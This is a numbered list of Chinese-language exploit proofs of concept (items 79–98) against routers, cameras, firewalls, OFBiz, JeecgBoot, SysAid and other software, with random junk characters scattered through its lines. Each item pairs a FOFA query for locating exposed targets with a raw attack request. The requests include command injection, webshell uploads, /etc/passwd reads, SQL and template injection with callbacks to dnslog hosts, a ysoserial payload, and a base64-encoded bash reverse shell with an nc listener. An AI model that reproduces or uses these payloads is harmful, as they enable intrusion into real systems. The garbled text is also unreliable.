------YsOxWxSvj1KyZow1PTsh98fdu6l--
1 g1 g9 t+ @ l' o; }
$ Z0 ~% } s+ x
2 o% o2 s. P1 m5 jGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
. W5 K: Z9 s5 k5 s9 f: E0 eHost: x.x.x.x
5 Y. O+ }$ `& ~8 _) g3 v8 X9 O8 ], R2 o( b5 Y' `
8 c$ f8 L: D5 v$ g. s79. BYTEVALUE 百为流控路由器远程命令执行
/ v$ r4 C% f: K) p3 TFOFA:BYTEVALUE 智能流控路由器
' W. a- ]4 T; y/ P# iGET /goform/webRead/open/?path=|id HTTP/1.1
- x7 L; H/ V jHost:IP2 @, L8 r& D6 ]: h4 t: ?6 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
( O$ c! Y% a( FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ N# s9 d; H8 ?/ n8 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( B2 [2 A0 g* F( l6 l. ZAccept-Encoding: gzip, deflate
. c8 Y0 @$ ~) d2 JConnection: close
' `8 f' ?/ O& sUpgrade-Insecure-Requests: 1# J: _* L& l: y! q+ W4 Q% q
" C5 u$ R8 Z8 S2 Q
3 k4 _$ P& [6 f9 _) Q7 h, a
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 p; ^9 N( Z- w* i1 E- C- s
FOFA:app="速达软件-公司产品"
" k& o8 t) B( h4 Z: Q9 M. aPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.10 q) b, x! b q& V1 g, d, u9 ~
Host: x.x.x.x
: h, P( B- A# o x* v3 H# kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( o8 i Q$ L6 ?+ o3 h4 ~$ e6 m! w
Content-Length: 279 N6 M( m' ^9 L2 B: t" j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 G/ k/ ^8 r* m6 `, }* ?& F" d: v; jAccept-Encoding: gzip, deflate
x3 ~8 _" X; A; K; V! GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) G K0 v2 d5 ~4 _; s; MConnection: close
$ `9 z9 n2 Y2 t# I0 a/ YContent-Type: application/octet-stream/ S6 T2 J0 F0 n: l
Upgrade-Insecure-Requests: 1! k1 ^3 m' F: V+ L' ]. G& V d+ E
+ u5 D8 d+ d& @6 M
<% out.print("oessqeonylzaf");%> D5 E5 C! z0 `. |) Y# g2 u* x, W# e
& G; }3 B. a6 u, G- M( E
4 E) [$ V \ rGET /xykqmfxpoas.jsp HTTP/1.1# Q" I0 e; U0 Z! O* x
Host: x.x.x.x6 q, F4 T9 V1 q/ _8 O$ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' o& M4 J5 V |& ~7 d- D6 TConnection: close
( P' O8 w/ H9 a' `( XAccept-Encoding: gzip
8 U1 r# q7 o! ]; |$ `: j* e9 z7 o9 K* o! _6 @! D
$ k/ Y5 t% h9 X4 c5 C% s
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
9 k5 m. \! t# RFOFA:app="uniview-视频监控"
( i0 H# c, N! x- ]0 V" [( BGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.15 `% ?6 I' j$ X& Z* l
Host: x.x.x.x8 C* a. }0 T6 a/ X& ~- j* W! f1 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 @- \4 ?9 {6 I# tConnection: close: G& T$ `7 _0 K, X( K# L
Accept-Encoding: gzip/ a' h3 D- z h+ t* |; ]+ B# B
6 r4 _& @4 D: S8 T. K; O6 o
) M2 N1 H* I! y$ y$ B0 _82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行0 B! W) ]' y4 w# a( i. i
FOFA:app="思福迪-LOGBASE"
! q- {- ]$ {9 C* v1 V8 ~( F2 GPOST /bhost/test_qrcode_b HTTP/1.1* J5 Z/ H7 h" U. n' d3 Q' }
Host: BaseURL
2 Y) r# ^; T1 V" G( H/ b/ iUser-Agent: Go-http-client/1.1
% i; E7 z- U2 B' e7 \" tContent-Length: 238 o& m8 e' Y" `$ D' ~
Accept-Encoding: gzip
# J* ]! e4 V8 g* a) F& s0 ~Connection: close+ l, c- S$ ~# _" j5 ?
Content-Type: application/x-www-form-urlencoded
% _2 h- ^2 f: @% g* S: mReferer: BaseURL
6 E7 A$ m, S7 i5 ]6 c3 o7 P! s. Q3 _& l, Y) G# w
z1=1&z2="|id;"&z3=bhost
9 ^; R' ?' Y5 h
( Y6 n; G( G- T+ E5 N/ S9 w! [' l' {
83. JeecgBoot testConnection 远程命令执行
9 A6 x6 ]1 ]2 G" |, e8 P: `6 tFOFA:title=="JeecgBoot 企业级低代码平台"
1 [ f7 R$ z1 c
8 p& h) ]4 h/ ?0 C6 r- T' `2 s3 n
9 u3 S- d. N$ F" j$ i$ cPOST /jmreport/testConnection HTTP/1.1
" e& o; C [5 I/ q' {- [Host: x.x.x.x2 |; N% d' }/ J3 O' z5 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& g8 y+ f' j- H/ c( l6 s
Connection: close
2 D" [6 k( M; e' ?# i4 |Content-Length: 8881# v. l- h0 t9 |9 V
Accept-Encoding: gzip
5 e( t3 n. P+ |1 J+ i) w# lCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
6 G& D6 n3 P& @Content-Type: application/json
6 w9 A! K( P! r; y$ c- ~3 K! K$ ? q3 e4 X- Y" N
PAYLOAD
/ L) ?8 b5 [0 b9 |; Y" @
% ]3 ?7 X3 n2 ~3 p, e# {84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. X7 k6 m8 Q4 ~: ^2 _FOFA:title=="JeecgBoot 企业级低代码平台"
6 c/ X" g6 `- ?0 X" S; K+ i0 E: r, i9 A3 M: N7 Q3 U; I' ?2 H
7 p+ p/ |; g3 d
' g' N! [) b" Q) C7 Q" b9 n1 PPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.14 K7 N/ G* x6 \$ g6 k3 |
Host: 192.168.40.130:8080
4 F6 E0 u! c0 O% b# s- }* y7 ZUser-Agent: curl/7.88.12 R* i6 ] U9 g; f: V& k
Content-Length: 156) ~6 a: c( I$ a. Z' ^9 F) Q8 _7 Z
Accept: */*
) r$ i7 K* l) z/ G2 EConnection: close
2 R5 j$ j. Y; t& P* t0 g: o& | }Content-Type: application/json
' T, ~& l; R6 [ H" K- \Accept-Encoding: gzip8 ]8 G) |8 L+ ]9 ~: t2 A
' T8 ^% i( ?& L9 u8 B{- R* [! M% I* ~6 m; o
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
$ x. o9 N O6 W "type": "0"6 x! M* r, H( \& y" u3 L% x" t
}/ r. [+ k1 z$ g
' u2 o4 C! T1 \0 B" p* ?0 g1 b. L
2 O7 n* [- a6 _% J! j1 b85. SysAid On-premise< 23.3.36远程代码执行5 P5 M Z. A3 b3 S) k
CVE-2023-47246& ^; j3 A! w2 h; Z+ J" I. h
FOFA:body="sysaid-logo-dark-green.png"
7 @' G: q6 _( {3 Q; e# Q7 _EXP数据包如下,注入哥斯拉马* w/ P% G5 m5 [; Y2 V/ T
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1; m. u) l( m' \& n# U, w: Y- \
Host: x.x.x.x2 o' q! H9 H: r/ G3 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 T' l; i. L2 Z+ Q$ P0 X( n6 h/ @
Content-Type: application/octet-stream/ `. [- h1 |3 R, o. h( t: C$ B9 }2 V
Accept-Encoding: gzip6 Y/ A! m9 _, X
2 {7 ^; e9 i+ w2 G6 O. G4 p
PAYLOAD1 n9 n4 {6 R: h/ L% i+ {
- K- P+ B/ i* X- x回显URL:http://x.x.x.x/userfiles/index.jsp
: Z4 Q" t4 t* k* m5 E; ^# H- t$ I
0 a* n0 \6 o: B4 ^86. 日本tosei自助洗衣机RCE
% ^$ f# _# Q. j8 m8 V8 B# OFOFA:body="tosei_login_check.php"
) R [5 P7 @9 Y9 P5 |1 b' [POST /cgi-bin/network_test.php HTTP/1.1, d$ [4 D% n- f0 y5 _5 T, ]
Host: x.x.x.x4 H6 }( M* j& v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.365 Z7 X6 r& x$ X
Connection: close
[6 d/ G7 m8 R7 l# g" p: _$ W1 lContent-Length: 44) j5 Q4 H" J( W' i$ J
Accept: */*0 u6 s0 _% P* j
Accept-Encoding: gzip
3 a/ e b$ \" X' g% r( {Accept-Language: en$ L$ S0 G, _) C- u8 Q+ u* B
Content-Type: application/x-www-form-urlencoded
: ^$ h( w7 X7 d ?" v! S7 {* w2 _; F/ k' Y4 o9 R$ k
host=%0acat${IFS}/etc/passwd%0a&command=ping, P# j7 m0 d$ p1 S o6 S# S' y; T
4 ]( J5 H& n* s" C6 X- ^ [& W6 P0 ?3 ^& [' \% c
87. 安恒明御安全网关aaa_local_web_preview文件上传 v4 |* H/ f8 K2 D8 q# f6 b5 n! a W
FOFA:title="明御安全网关"# Q& g' |+ L$ n1 m. y5 F5 L" f
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
/ f( ?' j1 M) I. j l- YHost: X.X.X.X
/ y. p2 p0 U1 ~) r" [. vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 H- |. @0 @ b5 H7 F% j5 ]/ O* Y
Connection: close
0 O0 d" r" a# h sContent-Length: 198$ K4 y& M) A2 ]9 u* L
Accept-Encoding: gzip0 ?8 H! d! A! b
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd- {/ q7 K. q" M2 h. p
/ c4 x0 x1 p; B4 X
--qqobiandqgawlxodfiisporjwravxtvd2 N' a9 T. I$ \
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
" S+ i7 Z, L- h9 _9 lContent-Type: text/plain
4 F- e9 H( ]( v" ^3 O
; X7 {3 i* n! {+ f/ i- t. d Z$ P2ZqGNnsjzzU2GBBPyd8AIA7QlDq* X4 |# A9 a1 q/ Q' X- V- d9 c5 x" @
--qqobiandqgawlxodfiisporjwravxtvd--9 i. X$ J8 {2 N9 v: o
- Q; F, j! z9 c' l' R! U' U }
: t+ O1 ?0 ^% g, W; V! {4 B2 r. A/jfhatuwe.php7 \" I5 W% |4 ]0 \
' g! f7 E# ^5 |
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行5 C N% H3 V7 C6 a8 S( X
FOFA:title="明御安全网关"
1 @& D) P% a+ x vGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
" I2 y' w. s cHost: x.x.x.xx.x.x.x
6 ~' _ Y7 a7 ]6 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& k* _3 f5 Z! sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% {+ x. U1 \! k; V5 o2 {: yAccept-Encoding: gzip, deflate
4 \2 ]+ F- |9 S; \# pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# I& Y' j+ m% Q0 OConnection: close
% }( ~0 [' r; s# |: I( ?
4 t- \& N3 t( _# b
/ f" V% l0 y+ f2 @2 H6 @( d/astdfkhl.php
* V1 X4 q' j; w$ {0 Z
( K% B7 ] k! }- T89. 致远互联FE协作办公平台editflow_manager存在sql注入
/ P7 s8 {/ F n* |" UFOFA:title="FE协作办公平台" || body="li_plugins_download"
2 b: D/ L( n3 ?) [' ?POST /sysform/003/editflow_manager.js%70 HTTP/1.11 C) {. Y( r- d( t; L% j
Host: x.x.x.x( G) u; U4 F; h6 `( F5 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" ]2 e+ ~/ }# j4 z" JConnection: close- B' ~9 K5 b! U- B b
Content-Length: 41
0 }; L) J3 G, ?4 p$ y* z i; nContent-Type: application/x-www-form-urlencoded" ?9 Y7 b6 e( z1 Q" M/ @
Accept-Encoding: gzip
8 D( a, P M% E& C9 V% U' }0 q
' X, [5 I) G. I4 xoption=2&GUID=-1'+union+select+111*222--+
( \6 m7 a# k2 W$ O
# P: F( O4 p* a+ }: f+ a5 I1 T% @9 m+ C
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
, O# \7 n# F3 F5 }6 ~FOFA:icon_hash="-1830859634"
7 ]5 C4 I3 g Y. h; {4 o$ \POST /php/ping.php HTTP/1.1
) L- _ H4 H& U) eHost: x.x.x.x! \# B- A# n4 z; J# Q% w- [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% ]/ w8 Q% J2 v4 t$ G# `
Content-Length: 51+ L0 v" P% M% X) f
Accept: application/json, text/javascript, */*; q=0.01
) p4 S6 g& s" m& g% \# e2 L2 RAccept-Encoding: gzip, deflate9 t J" f5 P8 [8 v, B. U& _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 U4 z- s+ y- D. s6 E' I8 a9 w5 i uConnection: close
& A" y6 d2 X, YContent-Type: application/x-www-form-urlencoded
1 \: z# r/ d* u! q/ b) lX-Requested-With: XMLHttpRequest, U- w- y( n" k- v5 N
7 t/ _. Z: O3 L* I
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig1 K' B1 w( P6 Y; h: t# u. J
8 U8 u$ a# Q U) n# ]$ k g* I. L. _' S' ^) l" R2 a
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取 w p w4 `) a: r/ g' V1 g8 X1 s! @9 y! a
FOFA:title="综合安防管理平台"
3 y2 U, ?& r7 h% O% C/ y# b7 eGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.14 R# o3 W# ?2 k4 F
Host: your-ip: j: D" y5 `- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.363 X& C p/ I$ p4 [5 x( g& b
Accept-Encoding: gzip, deflate4 U1 Q* q3 h) L$ K5 g: M1 Z
Accept: */*/ o4 p- ]/ w/ ]3 F* ?
Connection: keep-alive
* _7 Z$ j3 |' F+ z9 M1 b4 B1 V1 ]0 \( W" @9 [. u4 n2 M
' E5 S1 p; Z3 X3 Z1 B( V3 G3 Y" ?: d( {. C+ R
92. 海康威视运行管理中心session命令执行
) e, @3 f/ r: i0 LFastjson命令执行' ?6 K1 D6 c* E3 N% W& h5 ~) p7 W3 C
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76": P6 [$ d( u$ h/ H* H% L! C
POST /center/api/session HTTP/1.1
( u+ W- H2 d6 X6 e! {! d( JHost:
( H% s, t6 n$ m* l7 z/ ]! XAccept: application/json, text/plain, */*
7 N0 q4 C- D: o( O/ M% W2 O- ~# o$ ZAccept-Encoding: gzip, deflate+ y6 u2 z" I7 B* c
X-Requested-With: XMLHttpRequest
' G1 ^3 D l9 g! [Content-Type: application/json;charset=UTF-8* p) D/ Q3 s* n" f3 a3 |1 A
X-Language-Type: zh_CN
' I) x" j5 N; @9 g4 FTestcmd: echo test
k6 i( I7 x6 W( e6 ?+ L* RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0 a3 \4 r/ c; Q" J( PAccept-Language: zh-CN,zh;q=0.9
0 ~% L# Q4 H5 T% p7 {, W7 IContent-Length: 57785 S/ L1 t2 x% ^9 b" o( d
& ]8 @" z6 Q! x" t3 v2 _0 ]PAYLOAD$ X% m! n# l+ L5 i: c
; U6 p% m$ L9 Y1 U2 O
8 S2 ?5 R- j; Y2 _3 o+ v8 q93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ s; Y/ Q5 \5 g" l, D+ zFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ o% l: v6 O8 A. Q2 M/ H# ]POST /?g=app_av_import_save HTTP/1.1
" s, `- }2 A" Q5 J7 eHost: x.x.x.x8 B; U, S3 ?) g: q1 H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
7 k/ e8 {7 C6 J" p* B7 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 q. x8 E" W: b0 d+ k B! ^! e$ n
' N/ Q! G N3 w3 \9 p. j. c------WebKitFormBoundarykcbkgdfx: t4 p. F% T) G, Z% i! H o8 n
Content-Disposition: form-data; name="MAX_FILE_SIZE"
" H- l2 w. V, @+ D$ g# a- s3 v
2 Q; N ~+ f8 _100000006 K/ P0 B6 E$ I- |8 H
------WebKitFormBoundarykcbkgdfx) J+ ~2 F: g8 f1 i7 `9 V" L
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
( ]' D) _6 t3 iContent-Type: text/plain" z5 ]7 I- ?; [# G/ E! N) L' K
$ l# Q/ {7 ?) _0 V% _
wagletqrkwrddkthtulxsqrphulnknxa
, ^# R, S8 b% m3 R, t3 X------WebKitFormBoundarykcbkgdfx3 y# t- P1 ^: U! s$ X2 x
Content-Disposition: form-data; name="submit_post". M( @) o7 I+ u( ^
; w I* f2 Q7 R$ I+ k9 e4 y A
obj_app_upfile2 L- @. T; i; m! f7 j2 y- f d
------WebKitFormBoundarykcbkgdfx6 x2 A Q) {5 S( }3 v9 ^* t3 S
Content-Disposition: form-data; name="__hash__"# Q1 V2 ]+ p) a
5 h6 d+ @, M" ^5 }+ q' K3 U
0b9d6b1ab7479ab69d9f71b05e0e9445; ` j) F+ ^+ }9 J3 R
------WebKitFormBoundarykcbkgdfx--
$ I- S( L( U4 X; t! t9 F" {8 f& Z$ g8 Q, @& @1 V/ W ?( [
. j( q0 \! \. }GET /attachements/xlskxknxa.txt HTTP/1.1
& O1 }( V0 M6 a7 Q) B0 \6 D1 u$ dHost: xx.xx.xx.xx
; J& \3 W: T% f7 V% H9 D9 H& mUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* X$ [6 E0 S4 Y' P
9 P" d& y; K5 _$ C' P+ R6 [$ |
1 r+ E( _( V; W# q94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传/ Z" Q! p" R# |9 Y
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
' J' h8 r! B, M7 APOST /?g=obj_area_import_save HTTP/1.1. J* w5 t4 F, B0 Q
Host: x.x.x.x/ d! E+ d: M" K/ T0 t$ k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
% U( H# N Q' e# R- G4 r" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 q$ J0 s, p" C9 n
- k, T" t4 F' U5 f% Q% B L9 i------WebKitFormBoundarybqvzqvmt
1 z3 b8 n0 w& v3 h0 F: BContent-Disposition: form-data; name="MAX_FILE_SIZE"
( F( r2 b1 k5 Y$ l
1 M* |% x" M6 }# s2 z* M' w10000000
( J. p- G6 L# S V. k( G6 \, X------WebKitFormBoundarybqvzqvmt* B$ a7 t. w1 c% E
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"! X/ ~) ]$ y8 a1 U6 M8 M+ H
Content-Type: text/plain) c9 T9 H. m" a. d( c
. `9 w% g* C9 o e
pxplitttsrjnyoafavcajwkvhxindhmu! [ A5 N/ p. |) i
------WebKitFormBoundarybqvzqvmt
/ q* S3 u; }+ yContent-Disposition: form-data; name="submit_post"
& f: s1 W+ Q! r" p! d8 K+ ]1 D0 S$ O( i
obj_app_upfile
( J/ P& @) f( F. i# p------WebKitFormBoundarybqvzqvmt. G$ d+ @. p. {- `; \
Content-Disposition: form-data; name="__hash__"
- r1 z% K: G2 M9 e2 g9 }1 X0 ~' g3 n4 ~2 X
0b9d6b1ab7479ab69d9f71b05e0e9445
2 @6 H- t% m4 B* v& X. J% v) r------WebKitFormBoundarybqvzqvmt--
0 F0 {2 ^" {; a4 P$ [4 R+ ^( C% x/ e: o1 M7 w& `/ D/ z
3 P8 F1 T* T. W5 n S/ x& v
$ A5 z+ z: p, ^5 RGET /attachements/xlskxknxa.txt HTTP/1.1
' y9 d$ O. u7 tHost: xx.xx.xx.xx
6 U q" {& A2 n4 m! E, d. SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ @' v" r* b- `" v1 i% E# _+ h
% h3 ?. P1 X/ H. I- f& p7 b) P. e( f2 M" P& F: Q" |! ?* P
. ]. h; S5 l, }: Z
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ M+ ^ u* A& M; \' L3 M* y! ]/ j
CVE-2023-49070
# @9 O: ?# {6 I1 @5 EFOFA:app="Apache_OFBiz"
4 O( l* [# i+ {POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% M* }5 y+ L9 U7 \
Host: x.x.x.x
2 ?1 r4 `" _. T. t3 e2 Y, HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 l3 _3 [" F8 gConnection: close. ^% _% c4 }- K! F' ]$ m5 _
Content-Length: 889
0 D" j/ [! e$ u6 iContent-Type: application/xml+ T$ K* F9 N: x3 r
Accept-Encoding: gzip
- k' ~ k7 ]! B
' e {$ {+ L* K8 {* q0 P+ }; k. D% j<?xml version="1.0"?>2 k( ?& Y5 S; Z. V) X" u
<methodCall>' K7 K, t. ^! S* c9 I
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>% W! c7 c+ K0 T# T" f2 y2 Z. U
<params>
$ d7 P0 M' \6 l& m2 H) M! { <param>. K6 h% r% z& e& ?5 E7 h! n% b* U
<value>2 z# o, F- |8 @. e+ i; \) `
<struct>
! k a( o4 v: Z2 z) \: I# t <member>
+ e: D* F* m) L5 o- a6 d! q4 o <name>test</name>. z# D( Z# Q4 G
<value> u' J8 U7 m8 n; v5 i- ?
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
# R! r$ V4 F: b" M3 f% z) Q </value>
& q! R- K8 J6 Y& x1 T4 N/ U" i* Y </member>- r# F# y5 {3 M- T
</struct>7 I# N& @0 C1 o9 O* w8 ]
</value>* u+ W! Q# _% ]& F
</param>' _, O: L4 M+ b+ B+ t! w
</params>& J3 Q5 G d& j, w C; m6 }
</methodCall>
' N, S1 m6 I) m, p% |' a- y
- J% X. o$ s& m1 F9 u
# F3 G1 S. w8 N0 S! D用ysoserial生成payload. K9 m Y3 d3 c, n$ k& ]7 ^; |% i
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n": G* ^ F& ^; B' T6 `: `- C
) r% m5 `$ R* m2 X X% R' X8 P$ B0 J, S# }1 C3 `% u8 v4 ~
将生成的payload替换到上面的POC
|% Y$ r4 X( W8 B5 OPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
}1 x0 O) {1 {1 b% J- Y tHost: 192.168.40.130:8443
$ B; {3 T: z" A; ^9 L7 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ b6 C3 T: s9 P5 u2 }5 kConnection: close
1 O1 E% b) k9 @0 l ?Content-Length: 889
; ?8 Y+ i/ f8 N' ^; I, \, GContent-Type: application/xml$ Y& H- e( @1 h- W( t
Accept-Encoding: gzip
! |: G8 D0 J" F
4 t! R6 ~( v: a9 UPAYLOAD6 D; T( z" g w9 M7 x v3 j
( j1 ? a) H* _8 s96. Apache OFBiz 18.12.11 groovy 远程代码执行
: R7 i$ w b# b, l( @0 V" ZFOFA:app="Apache_OFBiz"0 {( P/ O2 o% m" ]0 a' u
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) W$ t& K) L7 a5 {3 H2 EHost: localhost:84435 |0 x" y# i- J* @! N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ O' H: [- d, Q* P8 UAccept: */*% G9 D7 e" Y" q$ h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 r# a, h% `& k& oContent-Type: application/x-www-form-urlencoded0 U, w6 G* M: K/ B+ u2 ~: T$ t
Content-Length: 55
- G' |. C/ s6 [8 a+ R/ n1 X* B5 k" V9 c& p
groovyProgram=throw+new+Exception('id'.execute().text);
# N8 @& u! p4 t! i. a
4 N6 a* r6 I8 M& F/ x- D+ D1 e9 U9 B, M+ _2 w$ G
反弹shell
0 W' ^6 k/ [& o, T5 {9 v在kali上启动一个监听
4 h: ~6 Q c5 _" ^, Cnc -lvp 7777
* V2 i$ h6 U6 i" O$ O3 s) {4 v0 T2 ~# b7 u6 y6 ?9 Y$ ~9 G4 _
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% g+ v6 X1 ~& K% a) l1 @# ?1 V
Host: 192.168.40.130:8443
) n9 f8 R+ e3 C9 Z' }1 C; AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# q+ c4 t4 j0 i* yAccept: */*
: w6 [+ |% E) J( tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 a: m7 E, F1 r$ Z$ C1 KContent-Type: application/x-www-form-urlencoded6 V" x& U) _, @' Y$ T- A; s R& e
Content-Length: 71
, i* L0 M! F" N) p: G" F
& t7 ]3 b. s( _# ]groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
" V# t2 H. P8 h& m1 V0 o- p2 U$ X* j. T- W/ j
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行5 W) S) W# Q$ o( a7 k9 D# U
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"/ K6 m) |/ g3 Z# L' g9 t v
GET /passport/login/ HTTP/1.1" E& M& V. i+ u' j" K' x
Host: 192.168.40.130:80852 y% d& Q: v( L$ a: r8 B5 a' n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) n2 ]" R- M2 ~+ Q' a
Accept-Encoding: gzip
& O; p: a' F, PConnection: close
8 u/ f, m) Z* D! a" W( R( yCookie: rememberMe=PAYLOAD
1 }* X, w" Y. k& Y+ g5 KX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"9 l9 P+ e1 f% {; q. R
. ~, R- a4 ~. z& F( ^# l3 w( n' C, `4 C6 @
98. SpiderFlow爬虫平台远程命令执行
* U H; L1 z$ n8 bCVE-2024-0195
' v* l. y- Z( i$ E- |# zFOFA:app="SpiderFlow"5 J5 r5 ]- I2 Q
POST /function/save HTTP/1.1
7 t( C. @# Q8 J5 U m" k8 q H# J qHost: 192.168.40.130:8088
$ [: w" \6 G, P9 S) q1 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' q v4 u: s2 V7 o1 f$ ~6 hConnection: close. o! _$ V2 D3 K6 ]( L
